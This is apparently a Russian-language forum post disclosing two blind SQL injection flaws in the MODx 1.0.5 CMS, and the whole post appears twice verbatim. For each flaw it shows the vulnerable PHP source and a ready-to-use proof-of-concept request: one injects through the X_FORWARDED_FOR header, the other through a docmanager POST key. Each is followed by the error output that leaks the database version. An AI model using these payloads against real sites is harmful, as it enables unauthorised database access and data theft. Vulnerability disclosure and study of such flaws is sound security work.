TeamPro
08.08.2012, 05:29
Автор: TeamPRO (c)
Дата: 22.07.2012
Наличие патча: -
Blind SQL Injection
Требования: Аккаунт пользователя / magic_quotes = off
Уязвимый скрипт: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php
PHP:
if (getenv("HTTP_CLIENT_IP"))$ip=getenv("HTTP_CLIENT_IP");
else if(getenv("HTTP_X_FORWARDED_FOR"))$ip=getenv("HTTP_X_FORWARDED_FOR");
else if(getenv("REMOTE_ADDR"))$ip=getenv("REMOTE_ADDR");
else$ip="UNKNOWN";$_SESSION['ip'] =$ip;
$itemid= isset($_REQUEST['id']) &&is_numeric($_REQUEST['id']) ?$_REQUEST['id'] :'NULL';$lasthittime=time();$a=998;
if($a!=1) {
$sql="REPLACE INTO$dbase.`".$table_prefix."active_users` (internalKey, username, lasthit, action, id, ip) values(-".$_SESSION['webInternalKey'].", '".$_SESSION['webShortname']."', '".$lasthittime."', '".$a."', ".$itemid.", '$ip')";
if(!$rs=$modx->dbQuery($sql)) {
$output="error replacing into active users! SQL: ".$sql;
return;
}
P0C:
авторизируемся.Посылаем еще один запрос со своими куками.
Code:
GET \ POST http://localhost/modx-1.0.5/
X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and'dasa
Cookie: [mycookies]
--->
Code:
Execution of a query to the database failed - Duplicate column name '5.0.92-log' »
Blind SQL Injection
Требования: аккаунт администратора
Уязвимый скрипт: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php
PHP:
foreach ($_POSTas$key=>$value) {
if (substr($key,0 ,10) =='update_tv_'&&$value=='yes') {
$tvKeyName=substr($key,10);
$typeSQL=$this->modx->db->select('*',$this->modx->getFullTableName('site_tmplvars'),'id='.$tvKeyName .'');
$row=$this->modx->db->getRow($typeSQL);
P0C:
Code:
POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1
tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
--->
Code:
Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key' »
Дата: 22.07.2012
Наличие патча: -
Blind SQL Injection
Требования: Аккаунт пользователя / magic_quotes = off
Уязвимый скрипт: /modx-1.0.5/assets/snippets/weblogin/weblogin.inc.php
PHP:
if (getenv("HTTP_CLIENT_IP"))$ip=getenv("HTTP_CLIENT_IP");
else if(getenv("HTTP_X_FORWARDED_FOR"))$ip=getenv("HTTP_X_FORWARDED_FOR");
else if(getenv("REMOTE_ADDR"))$ip=getenv("REMOTE_ADDR");
else$ip="UNKNOWN";$_SESSION['ip'] =$ip;
$itemid= isset($_REQUEST['id']) &&is_numeric($_REQUEST['id']) ?$_REQUEST['id'] :'NULL';$lasthittime=time();$a=998;
if($a!=1) {
$sql="REPLACE INTO$dbase.`".$table_prefix."active_users` (internalKey, username, lasthit, action, id, ip) values(-".$_SESSION['webInternalKey'].", '".$_SESSION['webShortname']."', '".$lasthittime."', '".$a."', ".$itemid.", '$ip')";
if(!$rs=$modx->dbQuery($sql)) {
$output="error replacing into active users! SQL: ".$sql;
return;
}
P0C:
авторизируемся.Посылаем еще один запрос со своими куками.
Code:
GET \ POST http://localhost/modx-1.0.5/
X_FORWARDED_FOR: 127.0.0.1'and(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and'dasa
Cookie: [mycookies]
--->
Code:
Execution of a query to the database failed - Duplicate column name '5.0.92-log' »
Blind SQL Injection
Требования: аккаунт администратора
Уязвимый скрипт: /modx-1.0.5/assets/modules/docmanager/classes/dm_backend.class.php
PHP:
foreach ($_POSTas$key=>$value) {
if (substr($key,0 ,10) =='update_tv_'&&$value=='yes') {
$tvKeyName=substr($key,10);
$typeSQL=$this->modx->db->select('*',$this->modx->getFullTableName('site_tmplvars'),'id='.$tvKeyName .'');
$row=$this->modx->db->getRow($typeSQL);
P0C:
Code:
POST http://localhost/modx-1.0.5/manager/index.php?a=112&id=1
tid=3&pids=1&template_id=3&tabAction=changeTV&update_tv_1/**/or/**/(select/**/count(*)/**/from/**/(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(version(),floor(rand(0)*2)))=yes
--->
Code:
Execution of a query to the database failed - Duplicate entry '5.0.92-log1' for key 'group_key' »